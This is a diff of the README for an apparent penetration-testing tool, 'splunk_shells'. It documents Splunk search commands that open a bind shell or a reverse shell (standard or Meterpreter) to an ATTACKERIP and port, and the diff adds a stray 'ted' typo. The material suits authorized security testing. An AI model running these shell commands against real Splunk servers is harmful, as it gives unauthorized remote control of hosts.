TBGSecurity/splunk_shells/README.md

 using each of these shells can be done from the Search and Reporting app.
 Execute the following searches:

 '| bindshell SHELLTYPE PORTNUMBER'

 SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)

 PORTNUMBER - Specify the port you want the bind shell to listen on.
 If you do not specify a port number it defaults to 8888

-'| revshell SHELLTYPE ATTACKERIP ATTACKERPORT' SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)
+'| revshell SHELLTYPE ATTACKERIP ATTACKERPORT'

+SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)

 ATTACKERIP - Specify the IP that you want to shell to be sent back to.

-ATTACKERPORT - Specify the port you want the shell to be sent back to.
+tedATTACKERPORT - Specify the port you want the shell to be sent back to.